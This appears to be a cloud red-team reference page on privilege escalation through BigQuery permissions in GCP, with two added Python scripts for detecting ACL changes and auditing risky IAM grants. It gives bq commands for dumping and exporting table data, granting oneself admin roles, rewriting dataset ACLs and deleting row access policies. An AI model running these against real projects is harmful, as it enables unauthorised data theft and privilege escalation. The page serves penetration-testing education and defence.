GCP - BigQuery Privesc

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

BigQuery

For more information about BigQuery check:

GCP - Bigquery Enum

### Read Table

Reading the information stored inside a BigQuery table might reveal sensitive information. To access it, the permissions needed are `bigquery.tables.get`, `bigquery.jobs.create` and `bigquery.tables.getData`:

<details>
<summary>Read BigQuery table data</summary>

```bash
bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset-name>.<table-name>` LIMIT 1000'
```

</details>

### Export data

This is another way to access the data: export it to a Cloud Storage bucket and download the files containing the information.
To perform this action the following permissions are needed: `bigquery.tables.export`, `bigquery.jobs.create` and `storage.objects.create`.

<details>
<summary>Export BigQuery table to Cloud Storage</summary>

```bash
bq extract <dataset>.<table> "gs://<bucket-name>/table*.csv"
```

</details>

### Insert data

It might be possible to insert certain trusted data into a BigQuery table in order to abuse a vulnerability somewhere else. This can be done easily with the permissions `bigquery.tables.get`, `bigquery.tables.updateData` and `bigquery.jobs.create`:

<details>
<summary>Insert data into BigQuery table</summary>

```bash
# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset-name>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json
```

</details>

### `bigquery.datasets.setIamPolicy`

An attacker could abuse this privilege to **give themselves further permissions** over a BigQuery dataset:

<details>
<summary>Set IAM policy on BigQuery dataset</summary>

```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
```

</details>

### `bigquery.datasets.update`, (`bigquery.datasets.get`)

This permission alone allows you to update your access over a BigQuery dataset by modifying the ACLs that define who can access it:

<details>
<summary>Update BigQuery dataset ACLs</summary>

```bash
# Download current permissions, requires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>
```

</details>
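For review and detection of the ACL change described above, this added example (not part of the original page) compares a saved baseline of a dataset's `access` list with the current `bq show --format=prettyjson` output and reports every grant that was added. Both snapshots, the e-mail address and the labels `PUBLIC`, `NEW` and `ROLE-CHANGE` are constructed for the illustration.

```python
import json

# Constructed snapshots shaped like `bq show --format=prettyjson` output;
# only the "access" list of the dataset resource is used.
BASELINE = json.loads("""{"access": [
  {"role": "OWNER",  "specialGroup": "projectOwners"},
  {"role": "READER", "specialGroup": "projectReaders"},
  {"role": "WRITER", "userByEmail": "etl@example.com"}]}""")
CURRENT = json.loads("""{"access": [
  {"role": "OWNER",  "specialGroup": "projectOwners"},
  {"role": "READER", "specialGroup": "projectReaders"},
  {"role": "OWNER",  "userByEmail": "etl@example.com"},
  {"role": "READER", "specialGroup": "allAuthenticatedUsers"}]}""")

PUBLIC = {"allUsers", "allAuthenticatedUsers"}

def grants(dataset):
    """Map each principal (key type, JSON value) to the set of roles it holds."""
    out = {}
    for entry in dataset.get("access", []):
        role = entry.get("role", "(none)")  # authorized views carry no role
        for kind, value in entry.items():
            if kind != "role":
                key = (kind, json.dumps(value, sort_keys=True))
                out.setdefault(key, set()).add(role)
    return out

def added_grants(baseline, current):
    """Return (label, principal type, principal, role) for each grant not in the baseline."""
    before, after = grants(baseline), grants(current)
    findings = []
    for key, roles in sorted(after.items()):
        kind, principal = key[0], json.loads(key[1])
        for role in sorted(roles - before.get(key, set())):
            if isinstance(principal, str) and principal in PUBLIC:
                label = "PUBLIC"        # dataset opened to any Google account or anyone
            elif key not in before:
                label = "NEW"           # principal had no access before
            else:
                label = "ROLE-CHANGE"   # existing principal gained another role
            findings.append((label, kind, principal, role))
    return findings

if __name__ == "__main__":
    for finding in added_grants(BASELINE, CURRENT):
        print(*finding)
```
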

### `bigquery.tables.setIamPolicy`

An attacker could abuse this privilege to give themselves further permissions over a BigQuery table:

<details>
<summary>Set IAM policy on BigQuery table</summary>

```bash
# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy
```

</details>

### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

According to the documentation, with the mentioned permissions it is possible to **update a row access policy.**\
However, **using the `bq` CLI** you need some additional permissions: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.

<details>
<summary>Create or replace row access policy</summary>

```bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # An example filter was used
```

</details>

The filter ID can be found in the output of the row access policy listing. Example:

<details>
<summary>List row access policies</summary>

```bash
bq ls --row_access_policies <proj>:<dataset>.<table>

Id            Filter Predicate   Grantees                  Creation Time     Last Modified Time
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09
```

</details>

If you have **`bigquery.rowAccessPolicies.delete`** instead of `bigquery.rowAccessPolicies.update` you could also just delete the policy:

<details>
<summary>Delete row access policies</summary>

```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this)
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'
```

</details>

Caution

Another potential option to bypass row access policies would be to simply change the value of the restricted data. If you can only see rows where `term` is `Cfba`, just modify all the records of the table to have `term = "Cfba"`. However, BigQuery prevents this.
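To audit a project for the permission combinations listed in the sections above, this added example (not part of the original page) unions each member's permissions across all roles bound to it and reports which combinations are complete. The role definitions (shaped like `gcloud iam roles describe --format=json`), the policy bindings and the member names are constructed; only roles supplied in `ROLES` are resolved, so predefined roles would need their permission lists added.

```python
import json

# Technique -> permissions it needs, as listed in the sections of this page.
TECHNIQUES = {
    "read table": {"bigquery.tables.get", "bigquery.jobs.create", "bigquery.tables.getData"},
    "export data": {"bigquery.tables.export", "bigquery.jobs.create", "storage.objects.create"},
    "insert data": {"bigquery.tables.get", "bigquery.tables.updateData", "bigquery.jobs.create"},
    "dataset setIamPolicy": {"bigquery.datasets.setIamPolicy"},
    "dataset ACL update": {"bigquery.datasets.update"},
    "table setIamPolicy": {"bigquery.tables.setIamPolicy"},
    "row access policy update": {"bigquery.rowAccessPolicies.update",
                                 "bigquery.rowAccessPolicies.setIamPolicy",
                                 "bigquery.tables.getData", "bigquery.jobs.create"},
}

# Constructed custom roles and IAM policy for a hypothetical project "example-proj".
ROLES = json.loads("""[
  {"name": "projects/example-proj/roles/jobRunner",
   "includedPermissions": ["bigquery.jobs.create", "bigquery.tables.get"]},
  {"name": "projects/example-proj/roles/tableReader",
   "includedPermissions": ["bigquery.tables.getData"]},
  {"name": "projects/example-proj/roles/datasetEditor",
   "includedPermissions": ["bigquery.datasets.get", "bigquery.datasets.update"]}]""")
POLICY = json.loads("""{"bindings": [
  {"role": "projects/example-proj/roles/jobRunner",
   "members": ["user:analyst@example.com", "serviceAccount:etl@example.com"]},
  {"role": "projects/example-proj/roles/tableReader", "members": ["user:analyst@example.com"]},
  {"role": "projects/example-proj/roles/datasetEditor", "members": ["serviceAccount:etl@example.com"]}]}""")

def effective_permissions(member, policy, roles):
    """Union of permissions from every supplied role bound to the member."""
    by_name = {r["name"]: set(r.get("includedPermissions", [])) for r in roles}
    perms = set()
    for binding in policy.get("bindings", []):
        if member in binding.get("members", []):
            perms |= by_name.get(binding["role"], set())
    return perms

def enabled_techniques(perms):
    """Names of the combinations that are fully covered by the permission set."""
    return sorted(name for name, need in TECHNIQUES.items() if need <= perms)

def audit(policy, roles):
    members = sorted({m for b in policy.get("bindings", []) for m in b.get("members", [])})
    return {m: enabled_techniques(effective_permissions(m, policy, roles)) for m in members}

if __name__ == "__main__":
    for member, hits in audit(POLICY, ROLES).items():
        print(member, "->", ", ".join(hits) or "none")
```

Neither constructed role alone completes the read combination for `user:analyst@example.com`; it only appears once the permissions of both bound roles are merged.
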
